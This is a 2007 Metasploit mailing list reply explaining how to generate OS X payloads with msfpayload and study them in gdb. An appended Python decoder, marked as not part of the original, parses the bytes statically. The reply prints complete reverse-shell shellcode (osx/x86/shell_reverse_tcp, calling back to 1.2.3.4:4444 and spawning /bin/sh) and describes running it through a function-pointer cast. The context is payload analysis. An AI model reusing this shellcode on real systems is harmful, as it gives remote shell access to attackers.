Metasploit mailing list archives
msfpayload mach-o
From: hdm at metasploit.com (H D Moore)
Date: Fri, 17 Aug 2007 16:56:14 -0500
On Friday 17 August 2007 16:47, Daniel Guido wrote:
> Are there any plans to write a Rex::Text.to_osxmacho function? :-)

Not yet, any volunteers? ;-)

> If I wanted to disassemble the OSX x86 payloads to see what they're
> doing, how could I write a small program to compile them and load them
> into gdb? (assuming that's the best way to go about it). I'm a little
> stuck.

Try something like:

$ msfpayload osx/x86/payload_name OPT=VAL C

Take this code, put it into a C file that casts the shellcode array to a
function pointer, then calls it (lots of examples in the shellcode section
of milw0rm.com). Then compile and breakpoint like any other app.

Example:

$ msfpayload osx/x86/shell_reverse_tcp LHOST=1.2.3.4 C
/*
 * osx/x86/shell_reverse_tcp - 65 bytes
 * http://www.metasploit.com
 * AppendExit=false, PrependSetresuid=false,
 * PrependSetuid=false, LPORT=4444, PrependSetreuid=false,
 * LHOST=1.2.3.4
 */
unsigned char buf[] =
"\x68\x01\x02\x03\x04\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";

Example C:
http://milw0rm.com/shellcode/536 PPC
http://milw0rm.com/shellcode/504 X86

-HD
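Added example, not part of the original message or of Metasploit: a static way to see what the payload above does without running it. It turns the msfpayload C output into raw bytes and decodes the sockaddr_in that the first two push instructions build. The function names are hypothetical, and the decoder assumes the two-push layout seen in this one payload.

```python
import re
import socket
import struct

# msfpayload C output from the message above, bytes copied unchanged.
MSF_C_OUTPUT = r'''
unsigned char buf[] =
"\x68\x01\x02\x03\x04\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";
'''


def c_array_to_bytes(c_source):
    """Collect every \\xNN escape found inside the quoted string literals."""
    literals = re.findall(r'"((?:\\x[0-9a-fA-F]{2})+)"', c_source)
    return bytes(int(h, 16)
                 for lit in literals
                 for h in re.findall(r'\\x([0-9a-fA-F]{2})', lit))


def decode_pushed_sockaddr(code):
    """Decode a BSD sockaddr_in built by two leading `push imm32` (0x68).

    The second push ends up at the lower stack address, so the structure
    in memory is the second immediate followed by the first.
    Returns (family, port, address), or None if the pattern is absent.
    """
    if len(code) < 10 or code[0] != 0x68 or code[5] != 0x68:
        return None
    raw = code[6:10] + code[1:5]
    # BSD layout: sin_len (1 byte), sin_family (1 byte), sin_port (big-endian)
    _sin_len, family, port = struct.unpack(">BBH", raw[:4])
    return family, port, socket.inet_ntoa(raw[4:8])


if __name__ == "__main__":
    payload = c_array_to_bytes(MSF_C_OUTPUT)
    print(len(payload), "bytes")
    print("sockaddr_in (family, port, addr):", decode_pushed_sockaddr(payload))
    # Write the raw bytes out so a disassembler can read them.
    with open("payload.bin", "wb") as fh:
        fh.write(payload)
```

The resulting payload.bin can be read with a disassembler such as `ndisasm -b 32 payload.bin`, which shows the instructions without executing them.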